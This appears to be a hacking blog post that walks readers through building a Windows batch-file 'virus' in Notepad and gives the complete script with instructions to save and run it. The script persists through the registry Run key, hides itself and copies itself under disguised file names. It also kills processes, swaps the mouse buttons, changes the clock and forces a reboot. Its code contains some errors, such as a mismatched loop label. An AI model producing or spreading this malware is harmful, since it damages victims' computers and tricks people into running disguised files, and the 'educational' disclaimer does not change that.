
Hey Guys,welcome to Hackers Den,today I will show you How To Make A Dangerous Virus Using Notepad.
What Are Viruses?
Viruses are malware which can cause a lot of harm to P.C., Computer and Laptop. Usually, they spread through sharing of files specially on Internet. Torrents file sharing and Email attachments are common ways to spread a virus.What a Batch File is?
It is simply a text file, containing series of commands, which are executed automatically, line by line, when the batch file runs. I have used several commas to divide the sentence in many parts to make it easier to understand.
So, using Batch File you can create extremely dangerous viruses to delete the Windows files, format different drives(C:\,D:\,E:\), steal information.
.
.
Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
What Will This Batch File Virus Will Do ?
1.Copy itself into startup2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
NOTE
Am not responsible for any harm caused to your computer or others computers.This is Just an Educational Post.
Final Words
Now, here was some small yet extremely dangerous Batch File virus. You need to just press Copy and Paste code in Notepad. After that save the notepad file as "anyname.bat". Be sure to use '.bat' as extension otherwise it will not work
No comments:
Post a Comment